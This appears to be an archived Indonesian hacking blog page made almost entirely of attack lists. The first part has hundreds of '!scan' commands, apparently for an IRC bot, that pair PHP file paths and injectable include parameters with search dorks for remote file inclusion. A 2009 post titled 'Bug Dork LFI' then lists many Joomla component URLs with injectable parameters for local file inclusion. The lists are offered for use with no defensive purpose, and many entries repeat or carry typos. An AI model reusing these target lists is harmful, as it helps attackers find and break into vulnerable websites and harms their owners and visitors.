!scan components/com_cloner/cloner.php?mosConfig_absolute_path= “joomla”
!scan administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path= com_multibanners
!scan administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site= com_a6mambohelpdesk
!scan components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path= com_mambatstaff
!scan components/com_securityimages/configinsert.php?mosConfig_absolute_path= com_securityimages
!scan components/com_securityimages/lang.php?mosConfig_absolute_path= com_securityimages
!scan components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= com_artlinks
!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= com_galleria
!scan administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= com_mgm
!scan components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path= com_mambatstaff
!scan redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]= inurl:redaxo
!scan admin.php?include_path= Advanced Guestbook 2.3.4
!scan template.php?page= phpBB Group
!scan phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path= phpBB Group
!scan forum/admin/admin_cash.php?setmodules=1&phpbb_root_path= phpBB Group
!scan mods/iai/includes/constants.php?phpbb_root_path= phpBB PlusXL
!scan phpBB2-MODificat/includes/functions.php?phpbb_root_path= PHPBB2
!scan includes/bbcb_mg.php?phpbb_root_path= phpBBXS
!scan includes/archive/archive_topic.php?phpbb_root_path= phpbbXtra
!scan modules.php?op=modload&name=Wiki&file=index&pagename= PHP-Wiki
!scan includes/setup.php?phpc_root_path= PHP-Calendar
!scan templates/default/tpl_message.php?right_file= “PHP TopTree BBS”
!scan config.php?fullpath= “PHP TopSites” popopo
!scan auction/email_request.php?user_id= “PHP Surveyor”
!scan modules/projects/index.php?full_path= “PHP Project Management”
!scan xarg_corner.php?xarg= “PHP Image XArg”
!scan screen.php?neurl= “News Evolution” ste
!scan /_theme/breadcrumb.php?rootBase= new Female Celebrities
!scan show.php?file= “Helplink”
!scan form.php?floap=modfich&do= GenesisTrader
!scan inc/pipe.php?HCL_path= “Help Center Live”
!scan admin/business_inc/saveserver.php?thisdir= confixx
!scan modules/Forums/favorites.php?nuke_bb_root_path= “Powered by Platinum”
!scan /manager/index.php= “Etomite”
!scan /index.php?basePath= “gizzar”
!scan /Index.php?abs_url= “PEGames”
!scan /index.php?page= “3editor CMS”
!scan /index.php?AML_opensite= “AllMyLinks”
!scan /index.php?AMV_openconfig=1&AMV_serverpath= “AllMyVisitors”
!scan /lang/index.php?file= “oreon”
!scan /index.php?gen= “mafia-2-0-0?
!scan /index.php?catid= “CascadianFAQ”
!scan /index.php?rootpath= “DreamStats System”
!scan /index.php?n= “Jupiter CMS”
!scan /index.php?option=news&aktion=komm&ID= “HC NEWSSYSTEM”
!scan /index.php?function=custom&custom= “Shopping Catalog”
!scan /admin/index.php?p= “iPrimal”
!scan /classes/index.php?siteconf= “Lithium”
!scan /Cookie/index.php= “Imageview”
!scan /index.php= “Berty Forum”
!scan /index.php?section= “Jasmine-Web”
!scan /index.php?contentSpecial= “eboli”
!scan /templates/tmpl_dfl/scripts/index.php?dir[inc]= “Boonex Dolphin”
!scan /index.php?page= “tagit2b”
!scan /index.php?catid= “PHP Classifieds”
!scan /search.php?catid_search= “PHP Classifieds”
!scan /p!scan /search.php?catid_search= “PHP Classifieds”
!scan /index.php?file_name[]= “PowerPortal”
!scan /admin/index.php?o= “BrudaGB”
!scan /index.php?gr_1_id= “Eskolar”
!scan /boitenews4/index.php?url_index= “Boite de News”
!scan /index.php?news_include_path= “newsReporter”
!scan /index.php?page= “ClanSys”
!scan /index.php?mod=sondages&do= “PwsPHP”
!scan /appserv/main.php?appserv_root= appserv
!scan solpot.html?body= allinurl: “solpot.html?body”
!scan /config.php?xcart_dir= “X-CART”
!scan /ws/login.php?includedir= WebCalendar
!scan /ws/login.php?includedir= WebCalendar v0.9.45
!scan ocp-103/index.php?req_path= ocPortal
!scan images/evil.php?owned= e107
!scan index.php?module=PostWrap&page= PostNuke PostWrap
!scan mcNews/admin/header.php?skinfile= mcNews
!scan inc/download_center_lite.inc.php?script_root= “Download Center Lite”
!scan zboard/zboard.php?id= Zeroboard
!scan index.php?node=system&op=extop&ext=statman&eop=/visitor&ip= Nodez
!scan include/SQuery/gameSpy2.php?libpath= intitle:”Autonomous LAN party”
!scan event.php?myevent_path= MyEvent
!scan index.php?page= “Internet PhotoShow”
!scan mod/authent.php4?rootpath= RechnungsZentrale
!scan about.php?DFORUM_PATH= dForum
!scan post.php?DFORUM_PATH= dForum
!scan movie_cls.php?full_path= Built2Go
!scan /toplist.php?f=toplist_top10&phpbb_root_path= inurl:”toplist.php” “powered by phpbb”
!scan admin/addentry.php?phpbb_root_path= inurl:guestbook.php “Advanced GuestBook” “powered by phpbb”
!scan /master.php?root_path= inurl:/system/article/alltopics.php
!scan /master.php?root_path= inurl:/system/user/index.php
!scan includes/kb_constants.php?module_root_path= “Powered by Knowledge Base”
!scan /classes/adodbt/sql.php?classes_dir= inurl:”index2.php?option=rss”
!scan /classes/adodbt/sql.php?classes_dir= “powered By Limbo CMS”
!scan /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= “Powered By Aardvark Topsites PHP 4.2.2?
!scan agenda.php3?rootagenda= “Powered by phpMyAgenda”
!scan agenda2.php3?rootagenda= “Powered by phpMyAgenda”
!scan show.php?path= inurl:”fclick.php?”
!scan eshow.php?Config_rootdir= “powered by Albinator”
!scan auction/auction_common.php?phpbb_root_path= intext:”phpbb – auction”
!scan auction/auction_common.php?phpbb_root_path= inurl:auction
!scan visible_count_inc.php?statitpath= inurl:visible
!scan index.php?inc_dir= “Powered by TotalCalendar” rrr
!scan /phpdig/includes/config.php?relative_script_path= “JetBox CMS”
!scan embed/day.php?path= intitle:”Login to Calendar”
!scan includes/dbal.php?eqdkp_root_path= “powered by EQdkp”
!scan claroline/auth/ldap/authldap.php?includePath= Dokeos
!scan /direct.php?rf= “ActualScripts, Company. All rights reserved.”
!scan /config.php?returnpath= “PHPListPro ?2001-2006 SmartISoft”
!scan addsite.php?returnpath= “PHPListPro ?2001-2006 SmartISoft”
!scan auth/auth.php?phpbb_root_path= phpRaid
!scan auth/auth_phpbb/phpbb_root_path= phpRaid
!scan includes/pafiledb_constants.php?module_root_path= PafileDB
!scan index.php?phpbb_root_path= “Powered by foing”
!scan extras/poll/poll.php?file_newsportal= “TR Newsportal” brought by TRanx.
!scan cart_content.php?cart_isp_root= inurl:/squirrelcart/
!scan ezusermanager_pwd_forgott.php?ezUserManager_Path= “powered by ezUserManager”
!scan includes/class_template.php?quezza_root_path= “Quezza BB”
!scan sources/news.php?CONFIG[main_path]= “Powered By ScozNews”
!scan classified_right.php?language_dir= phpbazar
!scan cron.php?ROOT_PATH= “powered by phpmydirectory”
!scan cron.php?ROOT_PATH= intext:”2001-2006 phpMyDirectory.com”
!scan reconfig.php?GLOBALS[CLPath]= “CaLogic Calendars”
!scan srxclr.php?GLOBALS[CLPath]= “CaLogic Calendars”
!scan sources/post.php?fil_config= “Fusion News”
!scan addpost_newpoll.php?addpoll=preview&thispath= allinurl:/ubbthreads/
!scan BE_config.php?_PSL[classdir]= “Back-End CMS”
!scan /index.php?site_path= “Powered by SocketMail”
!scan vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]= V-Webmail
!scan includes/mailaccess/pop3.php?CONFIG[pear_dir]= V-Webmail
!scan DOCEBO205/modules/credits/help.php?lang= “Docebo LMS”
!scan cached.php3?GLOBALS[AA_INC_PATH]= “APC ActionApps”
!scan jsview.php3?GLOBALS[AA_INC_PATH]= “APC ActionApps”
!scan auth.php3?GLOBALS[AA_INC_PATH]= “APC ActionApps”
!scan manager/frontinc/prepend.php?_PX_config[manager_path]= “Plume CMS”
!scan admin/lib_action_step.php?GLOBALS[CLASS_PATH]= “Hot Open Tickets”
!scan p-popupgallery.php?l= “F@cile Interactive Web”
!scan ubbt.inc.php?GLOBALS[thispath]= UBBThreads
!scan ubbt.inc.php?thispath= UBBThreads
!scan language/lang_english/lang_activity.php?phpbb_root_path= Activity MOD Plus phpBB
!scan blend_data/blend_common.php?phpbb_root_path= “Blend Portal”
!scan suche/search.php?config[fsBase]= “Fastpublish CMS”
!scan drucken.php?config[fsBase]= “Fastpublish CMS”
!scan includes/common.php?root_path= gnopaste
!scan error.php?default_path= “Ottoman CMS”
!scan app/edocument/edocument_basic_view_menu.php?system_path= metajour
!scan app/eproject/eproject_basic_view_menu.php?system_path= metajour
!scan app/erek/erek_basic_view_menu.php?system_path= metajour
!scan extension/article/article.class.php?system_path= metajour
!scan extension/search/search.class.php?system_path= metajour
!scan admin/menu.php?root_path= “AssoCIateD CMS”
!scan includes/webdav/server.php?bhconfig[bhfilepath]= Bytehoard
!scan include/addons/image_resize/pages/index.inc.php?REX[INCLUDE_PATH]= “Redaxo CMS”
!scan class/Wiki/Wiki.php?c_node[class_path]= Igloo
!scan ashheadlines.php?pathtoashnews= “powered by ashnews”
!scan ashnews.php?pathtoashnews= “powered by ashnews”
!scan admin/common-menu.php?CONF[local_path]= Informium
!scan modules/Forums/admin/index.php?phpbb_root_path= PHP-Nuke
!scan modules/Forums/admin/admin_words.php?phpbb_root_path= PHP-Nuke
!scan modules/Forums/admin/admin_smilies.php?phpbb_root_path= PHP-Nuke
!scan modules/Forums/admin/admin_users.php?phpbb_root_path= “PHP-Nuke”
!scan applications/faq/Bs_Faq.class.php?APP[path][applications]= “BlueShoes Framework”
!scan applications/filemanager/file.php?APP[path][core]= “BlueShoes Framework”
!scan inc/logincheck.inc.php?path= Webspotblogging
!scan inc/global.php?path= Webspotblogging
!scan classes/phpmailer/class.cs_phpmailer.php?classes_dir= Powered by CS-Cart – Shopping Cart Software
!scan /index.php?file_path= “dotwidget Printer-friendly”
!scan /includes/common.inc?file_path= “dotwidget Printer-friendly”
!scan /auth.cookie.inc.php?da_path= “powered by DreamAccount”
!scan /auth.header.inc.php?da_path= “powered by DreamAccount”
!scan _wk/wk_lang.php?WK[wkPath]= Wikiwig
!scan contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]= OpenEMR
!scan sources/post.php?fil_config= Xtreme/Ditto News
!scan class/jpcache/jpcache.php?_PSL[classdir]= “Back-end CMS”
!scan dialogs/td.php?spaw_root= cms-bandits
!scan dialogs/img.php?spaw_root= cms-bandits
!scan footer.php?absolutepath= “Enterprise Payroll Systems”
!scan admin/footer.php?absolutepath= “Enterprise Payroll Systems”
!scan phpcodecabinet_directory/include/Beautifier/Core.php?BEAUT_PATH= PHPCodeCabinet
!scan calendar.php?cfg_dir= “Visual Events Calendar”

!scan includes/usercp_register.php?phpbb_root_path= ZoneX 1.0.3 – Publishers Gold Edition

!scan lib/auth.inc.php?INIT_PATH= docpile:we !scan article-raw.php?file_newsportal= phNNTP

!scan genpage-cgi.php?REP_INC= Hitweb !scan CheckUpload.php?Language= “Cwfm-0.9.1?

!scan boitenews4/index.php?url_index= “Boite de News” !scan common.inc.php?CFG[libdir]= “PgMarket”

!scan owimg.php3?path= “See-Commerce” !scan tags.php?BBCodeFile= Tagger

!scan examples/image.php?image= “powered by twg”

!scan examples/examples/image.php2?image= “powered by twg”

!scan include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:”phpwcms/index.php?id=”

!scan src/Login.php?page= “Spaminator” !scan config.php?root_path= Thatware

!scan index.php?page= SaveWebPortal !scan inc/header.inc.php?ficStyle= phpPrintAnalyzer

!scan Classes/Event_for_month.php?_BASE= Chaussette

!scan install/install3.php?database=none&cabsolute_path= “WEBInsta Mailing list manager”

!scan BaseLoader.php?glConf[path_libraries]= MVCnPHP

!scan includes/session.php?wb_class_dir= Wheatblog

!scan index.php?templates_dir= “WEBinsta CMS”

!scan common.php?rootdir= projectbutler

!scan inc/indexhead.php?fileloc= discloser

!scan modules/usersonline/users.php?module_dir= “WEBinsta CMS”

!scan lib/specialdays.php?path_pre= “PHProjekt”

!scan lib/dbman_filter.inc.php?lib_path= “PHProjekt”

!scan classes/query.class.php?baseDir= dotProject

!scan include/urights.php?CRM_inc= Outreach Project Tool

!scan system/includes/pageheaderdefault.inc.php?_sysSessionPath= IRSR – Invisionix Roaming System Remote

!scan s03.php?shopid= powergap

!scan administrator/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= inurl:”/com_mtree/”

!scan administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:”com_a6mambocredits”

!scan handlers/email/mod.listmail.php?_PM_[path][handler]= PHlyMail Lite

!scan app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= phpCodeGenie

!scan administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path= inurl:”com_kochsuite”

!scan plugins/1_Adressbuch/delete.php?folder= Sonium Enterprise Adressbook AoAo

!scan administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= com_cropimage

!scan admin/autoprompter.php?CONFIG[BASE_PATH]= Cce-interact

!scan includes/common.inc.php?CONFIG[BASE_PATH]= Cce-interact

!scan include/novalib/class.novaEdit.mysql.php?TNLIB_DIR= Tutti Nova

!scan news.php?CONFIG[script_path]= Fantastic News

!scan include/yapbb_session.php?GLOBALS[includeBit]=devilteam&cfgIncludeDirectory= YapBB

!scan local/lib/lcUser.php?LIBDIR= “Local Calendar” !scan ?langage= EPNadmin

!scan themes/program/themesettings.inc.php?themesdir= “Segue CMS”

!scan lib/rs.php?rootpath= CASTOR
4 komentar more...

Bug Dork LFI

by Boim Blanco on Nov.22, 2009, under

/index.php?option=com_mscomment&controller= “com_mscomment”
/index.php?option=com_dioneformwizard&controller= “com_dioneformwizard”
/index.php?option=com_jequoteform&view= “com_jequoteform”
/index.php?option=com_g2bridge&controller= “com_g2bridge”
/components/com_sebercart/getPic.php?p= “com_sebercart”
/index.php?option=com_aardvertiser&cat_name=conf&task= “com_aardvertiser”
/index.php?option=com_aardvertiser&task= “com_aardvertiser”
/index.php?option=com_php&file= “com_php”
/index.php?option=com_articleman&task= “com_articleman”
/index.php?option=com_djclassifieds&view=showitem&cid=6&id=29&Itemid= “com_djclassifieds”
/index.php?option=com_smartsite&controller= “com_smartsite”
/index.php?option=com_noticeboard&controller= “com_noticeboard”
/index.php?option=com_ultimateportfolio&controller= “com_ultimateportfolio”
/components/com_portfolio/includes/phpthumb/phpThumb.php?w=800&src=
/index.php?option=com_mmsblog&controller= “com_mmsblog”
/index.php?option=com_orgchart&controller= “com_orgchart”
/index.php?option=com_wmi&controller= “com_wmi”
/index.php?option=com_archeryscores&controller= “com_archeryscores”
/index.php?option=com_zimbcomment&controller= “com_zimbcomment”
/index.php?option=com_zimbcore&controller= “com_zimbcore”
/index.php?option=com_gadgetfactory&controller= “com_gadgetfactory”
/index.php?option=com_matamko&controller= “com_matamko”
/index.php?option=com_multiroot&controller= “com_multiroot”
/index.php?option=com_multimap&controller= “com_multimap”
/index.php?option=com_drawroot&controller= “com_drawroot”
/index.php?option=com_google&controller= “com_google”
/index.php?option=com_if_surfalert&controller= “com_if_surfalert”
/index.php?option=com_g2bridge&controller= “com_g2bridge”
/index.php?option=com_mediqna&controller= “com_mediqna”
/index.php?option=com_mscomment&controller= “com_mscomment”
index.php?option=com_jejob&view= “com_jejob”
/index.php?option=com_dioneformwizard&controller= “com_dioneformwizard”
/index.php?option=com_smartsite&controller= “com_smartsite”
/index.php?option=com_noticeboard&controller= “com_noticeboard”
/index.php?option=com_orgchart&controller= “com_orgchart”
/index.php?option=com_ultimateportfolio&controller= “com_ultimateportfolio”
/index.php?option=com_wmi&controller= “com_wmi”
/index.php?option=com_archeryscores&controller= “com_archeryscores”
/index.php?option=com_zimbcomment&controller= “com_zimbcomment”
/index.php?option=com_zimbcore&controller= “com_zimbcore”
/index.php?option=com_gadgetfactory&controller= “com_gadgetfactory”
/index.php?option=com_multimap&controller= “com_multimap”
/index.php?option=com_multiroot&controller= “com_multiroot”
/index.php?option=com_matamko&controller= “com_matamko”
/index.php?option=com_google&controller= “com_google”

/index.php?option=com_if_surfalert&controller= “com_if_surfalert”
/index.php?option=com_drawroot&controller= “com_drawroot”
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= “admin_events.php”
//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= “admin_events.php”
/index.php?option=com_wgpicasa&controller= “com_wgpicasa”
/index.php?option=com_s5clanroster&view= “com_s5clanroster”
/index.php?option=com_s5clanroster&controller= “com_s5clanroster”
/index.php?option=com_lovefactory&controller= “com_lovefactory”
/index.php?option=com_jacomment&view= “com_jacomment”
/index.php?option=com_mtfireeagle&controller= “com_mtfireeagle”
/index.php?option=com_delicious&controller= “com_delicious”
/index.php?option=com_worldrates&controller= “com_worldrates”
/index.php?option=com_flexicontent&controller= “com_flexicontent”
/index.php?option=com_diary&controller= “com_diary”
/index.php?option=com_market&controller= “com_market”
/index.php?option=com_memory&controller= “com_memory”
/index.php?option=com_myfiles&controller= “com_myfiles”
/index.php?option=com_onlineexam&controller= “com_onlineexam”
/index.php?option=com_joommail&controller= “com_joommail”
/index.php?option=com_advertising&controller= “com_advertising”
/index.php?option=com_cvmaker&controller= “com_cvmaker”
/index.php?option=com_addressbook&controller= “com_addressbook”
/index.php?option=com_flashgames&controller= “com_flashgames”
/index.php?option=com_mediqna&controller= “com_mediqna”
/index.php?option=com_beeheard&controller= “com_beeheard”
/index.php?option=com_mscomment&controller= “com_mscomment”
/index.php?option=com_if_surfalert&controller= “com_if_surfalert”
/index.php?option=com_beeheardlite&controller= “com_beeheardlite”
/index.php?option=com_beeheard&controller= “com_beeheard”
/index.php?option=com_gadgetfactory&controller= “com_gadgetfactory”
/index.php?option=com_archeryscores&controller= “com_archeryscores”
/index.php?option=com_awiki&controller= “com_awiki”
/index.php?option=com_webeecomment&controller= “com_webeecomment”
/index.php?option=com_shoutbox&controller= “com_shoutbox”
/index.php?option=com_dwgraphs&controller= “com_dwgraphs”
/index.php?option=com_loginbox&view= “com_loginbox”
/index.php?option=com_appointment&controller= “com_appointment”
/index.php?option=com_datafeeds&controller= “com_datafeeds”
/index.php?option=com_vjdeo&controller= “com_vjdeo”
/index.php?option=com_agora&task=profile&page=avatars&action= “com_agora”
/index.php?option=com_projectfork§ion= “com_projectfork”
/index.php?option=com_ccnewsletter&controller= “com_ccnewsletter”
/index.php?option=com_biblestudy&id=1&view=studieslist&controller= “com_biblestudy”
/index.php?option=com_communitypolls&controller= “com_communitypolls”
/index.php?option=com_otzivi&controller= “com_otzivi”
index.php?option=com_intellect&page= “com_intellect”
/index.php?option=com_pro_desk&include_file= “com_pro_desk”
/index.php?option=com_omphotogallery&controller= “com_omphotogallery”
/components/com_moofaq/includes/file_includer.php?gzip=0&file= “com_moofaq”
/index.php?option=com_agora&task=profile&page=avatars&action= com_agora
/component/com_intuit/models/intuit.php?approval= “com_intuit”
/index.php?option=com_adagency&controller= com_adagency
/components/com_morfeoshow/morfeoshow.html.php?user_id= “com_morfeoshow”
/index.php?option= inurl:/index.php?option=
/index.php?option=com_if_nexus&controller= “com_if_nexus”
/index.php?option=com_abbrev&controller= “com_abbrev”
/index.php?option=com_bfsurvey&controller= “com_bfsurvey”
/index.php?option=com_dailymeals&view=dailymeals&controller= “com_dailymeals”
/index.php?option=com_biblestudy&id=1&view=studieslist&controller= “com_biblestudy”
/index.php?option=com_cartweberp&controller= “com_cartweberp”
/index.php?option=com_bfsurvey&controller= com_bfsurvey
/index.php?option=com_pc&controller= com_pc
/index.php?option=com_rwcards&controller= om_rwcards
/index.php?option=com_intellect&page= com_intellect
/index.php?option=com_pro_desk&include_file= com_pro_desk
/index.php?option=com_omphotogallery&controller= com_omphotogallery
/components/com_moofaq/includes/file_includer.php?gzip=0&file= com_moofaq
/index.php?option=com_projectfork§ion= com_projectfork
/index.php?option=com_agora&task=profile&page=avatars&action= com_agora
/component/com_intuit/models/intuit.php?approval= com_intuit
/index.php?option=com_adagency&controller= com_adagency
/index.php?option=com_abbrev&controller= com_abbrev
/index.php?option=com_bfsurvey&controller= com_bfsurvey
/index.php?option=com_dailymeals&view=dailymeals&controller= com_dailymeals
/index.php?option=com_biblestudy&id=1&view=studieslist&controller=com_biblestudy
/index.php?option=com_cartweberp&controller= com_cartweberp
/index.php?option=com_bfsurvey&controller= com_bfsurvey
/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]= jsloader.php
/index.php?option=com_otzivi&controller= com_otzivi
/index.php?option=com_redshop&view= com_redshop
/index.php?option=com_redtwitter&view= com_redtwitter
/index.php?option=com_myblog&Itemid=12&task= “com_myblog”
/index.php?option=com_juliaportfolio&controller= “com_juliaportfolio”
/index.php?option=com_sbsfile&controller= “com_sbsfile”
/index.php?option=com_rokdownloads&controller= “com_rokdownloads”
/index.php?option=com_sectionex&controller= “com_sectionex”
/index.php?option=com_ganalytics&controller= “com_ganalytics”
/index.php?option=com_janews&controller= “com_janews”
/index.php?option=com_linkr&controller= “com_linkr”
/index.php?option=com_rpx&controller= “com_rpx”
/index.php?option=com_ninjarsssyndicator&controller= “com_ninjarsssyndicator”
/index.php?option=com_gcalendar&controller= “com_gcalendar”
/index.php?option=com_ckforms&controller= “com_ckforms”
/index.php?option=com_jeformcr&view= “com_jeformcr”
/index.php?option=com_jresearch&controller= “com_jresearch”
/index.php?option=com_smestorage&controller= “com_smestorage”
/index.php?option=com_properties&controller= “com_properties”
/index.php?option=com_dwgraphs&controller= “com_dwgraphs”
/index.php?option=com_weberpcustomer&controller= “com_weberpcustomer”
/index.php?option=com_userstatus&controller= “com_userstatus”
/index.php?option=com_econtent&controller= “com_econtent”
/index.php?option=com_jvehicles&controller= “com_jvehicles”
/index.php?option=com_joomlapicasa2&controller= “com_joomlapicasa2?
/index.php?option=com_svmap&controller= “com_svmap”
/index.php?option=com_shoutbox&controller= “com_shoutbox”
/index.php?option=com_loginbox&view= “com_loginbox”
/index.php?option=com_myblog&Itemid=12&task= “com_myblog”
/index.php?option=com_juliaportfolio&controller= “com_juliaportfolio”
/index.php?option=com_sbsfile&controller= “com_sbsfile”
/index.php?option=com_rokdownloads&controller= “com_rokdownloads”
/index.php?option=com_sectionex&controller= “com_sectionex”
/index.php?option=com_ganalytics&controller= “com_ganalytics”
/index.php?option=com_janews&controller= “com_janews”
/index.php?option=com_linkr&controller= “com_linkr”
/index.php?option=com_rpx&controller= “com_rpx”
/index.php?option=com_ninjarsssyndicator&controller= “com_ninjarsssyndicator”
/index.php?option=com_gcalendar&controller= “com_gcalendar”
/index.php?option=com_ckforms&controller= “com_ckforms”
/index.php?option=com_jeformcr&view= “com_jeformcr”
/index.php?option=com_jresearch&controller= “com_jresearch”
/index.php?option=com_smestorage&controller= “com_smestorage”
/index.php?option=com_properties&controller= “com_properties”
/index.php?option=com_dwgraphs&controller= “com_dwgraphs”
/index.php?option=com_weberpcustomer&controller= “com_weberpcustomer”
/index.php?option=com_userstatus&controller= “com_userstatus”
/index.php?option=com_econtent&controller= “com_econtent”
/index.php?option=com_jvehicles&controller= “com_jvehicles”
/index.php?option=com_joomlapicasa2&controller= “com_joomlapicasa2?
/index.php?option=com_svmap&controller= “com_svmap”
/index.php?option=com_shoutbox&controller= “com_shoutbox”
/index.php?option=com_loginbox&view= “com_loginbox”
/index.php?option=com_bca-rss-syndicator&controller= “com_bca-rss-syndicator”
/index.php?option=com_joomlaupdater&controller= “com_joomlaupdater”
/index.php?option=com_redshop&view= “com_redshop”
/index.php?option=com_redtwitter&view= “com_redtwitter”
/index.php?option=com_wisroyq&controller= “com_wisroyq”
/index.php?option=com_jinventory&controller= “com_jinventory”
/index.php?option=com_appointment&controller= “com_appointment”
/index.php?option=com_datafeeds&controller= “com_datafeeds”
/index.php?option=com_fabrik&controller= “com_fabrik”
/index.php?option=com_hsconfig&controller= “com_hsconfig”
/index.php?option=com_joomlaflickr&controller= “com_joomlaflickr”
/index.php?option=com_jukebox&controller= “com_jukebox”
/index.php?option=com_jwhmcs&controller= “com_jwhmcs”
/index.php?option=com_sebercart&view= “com_sebercart”
/index.php?option=com_awiki&controller= “com_awiki”
/index.php?option=com_vjdeo&controller= “com_vjdeo”
/index.php?option=com_awdwall&controller= “com_awdwall”
/index.php?option=com_realtyna&controller= “com_realtyna”
/index.php?option=com_webeecomment&controller= “com_webeecomment”
/index.php?option=com_javoice&view= “com_javoice”
/index.php?option=com_foobla_suggestions&controller= “com_foobla_suggestions”
/index.php?option=com_powermail&controller= “com_powermail”
/index.php?option=com_pcchess&controller= “com_pcchess”
/index.php?option=com_spsnewsletter&controller= “com_spsnewsletter”
/index.php?option=com_alphauserpoints&view= “com_alphauserpoints”
/index.php?option=com_travelbook&controller= “com_travelbook”
/index.php?option=com_tweetla&controller= “com_tweetla”
/index.php?option=com_ticketbook&controller= “com_ticketbook”
/index.php?option=com_jajobboard&view= “com_jajobboard”
/index.php?option=com_jajobboard&controller= “com_jajobboard”
/index.php?option=com_jfeedback&controller= “com_jfeedback”
/index.php?option=com_jprojectmanager&controller= “com_jprojectmanager”
/index.php?option=com_preventive&controller= “com_preventive”
/index.php?option=com_myfiles&controller= “com_myfiles”
/index.php?option=com_onlineexam&controller= “com_onlineexam”
/index.php?option=com_joommail&controller= “com_joommail”
/index.php?option=com_memory&controller= “com_memory”
/index.php?option=com_market&controller= “com_market”
/index.php?option=com_diary&controller= “com_diary”
/index.php?option=com_webtv&controller= “com_webtv”
/index.php?option=com_horoscope&controller= “com_horoscope”
/index.php?option=com_arcadegames&controller= “com_arcadegames”
/index.php?option=com_flashgames&controller= “com_flashgames”
/index.php?option=com_addressbook&controller= “com_addressbook”
/index.php?option=com_flexicontent&controller= “com_flexicontent”
/index.php?option=com_advertising&controller= “com_advertising”
/index.php?option=com_cvmaker&controller= “com_cvmaker”
/index.php?option=com_worldrates&controller= “com_worldrates”
/index.php?option=com_record&controller= “com_record”
/index.php?option=com_sweetykeeper&controller= “com_sweetykeeper”
/index.php?option=com_beeheard&controller= “com_beeheard”
/index.php?option=com_blogfactory&controller= “com_blogfactory”
/index.php?option=com_delicious&controller= “com_delicious”
/index.php?option=com_jacomment&view= “com_jacomment”
/index.php?option=com_lovefactory&controller= “com_lovefactory”
/index.php?option=com_mtfireeagle&controller= “com_mtfireeagle”
/index.php?option=com_photobattle&view= “com_photobattle”
/index.php?option=com_s5clanroster&view= “com_s5clanroster”
/index.php?option=com_s5clanroster&controller= “com_s5clanroster”
/index.php?option=com_wgpicasa&controller= “com_wgpicasa”
/index.php?option=com_zimbcomment&controller= “com_zimbcomment”
/index.php?option=com_zimbcore&controller= “com_zimbcore”
/index.php?option=com_gadgetfactory&controller= “com_gadgetfactory”
/index.php?option=com_matamko&controller= “com_matamko”
/index.php?option=com_archeryscores&controller= “com_archeryscores”
/index.php?option=com_multiroot&controller= “com_multiroot”
/index.php?option=com_multimap&controller= “com_multimap”
/index.php?option=com_drawroot&controller= “com_drawroot”
/index.php?option=com_google&controller= “com_google”
/index.php?option=com_if_surfalert&controller= “com_if_surfalert”
/index.php?option=com_orgchart&controller= “com_orgchart”
/index.php?option=com_mmsblog&controller= “com_mmsblog”
/index.php?option=com_wmi&controller= “com_wmi”
/index.php?option=com_ultimateportfolio&controller= “com_ultimateportfolio”
/index.php?option=com_noticeboard&controller= “com_noticeboard”
/index.php?option=com_smartsite&controller= “com_smartsite”
/index.php?option=com_graphics&controller= “com_graphics”
/index.php?option=com_php&file= “com_php”
/index.php?option=com_aardvertiser&task= “com_aardvertiser”
/index.php?option=com_jejob&view= “com_jejob”
/index.php?option=com_jeajaxeventcalendar&view= “com_jeajaxeventcalendar”
/index.php?option=com_dioneformwizard&controller= “com_dioneformwizard”
/index.php?option=com_jequoteform&view= “com_jequoteform”
/index.php?option=com_mscomment&controller= “com_mscomment”
/index.php?option=com_simpledownload&controller= “com_simpledownload”
/index.php?option=com_event&view= “com_event”
/index.php?option=com_product&controller= “com_product”
/index.php?option=com_job&controller= “com_job”
/index2.php?option=com_simpledownload&controller= “com_simpledownload”
/index.php?option=com_perchaimageattach&controller= “com_perchaimageattach”
/index.php?option=com_perchafieldsattach&controller= “com_perchafieldsattach”
/index.php?option=com_perchadownloadsattach&controller= “com_perchadownloadsattach”
/index.php?option=com_perchagallery&controller= “com_perchagallery”
/index.php?option=com_perchacategoriestree&controller= “com_perchacategoriestree”
2 komentar more...

Labels

ingin mencari sesuatu?

mencari dan terus mencari:

keinginan hati jangan samakan dengan keinginan nafsu sekejap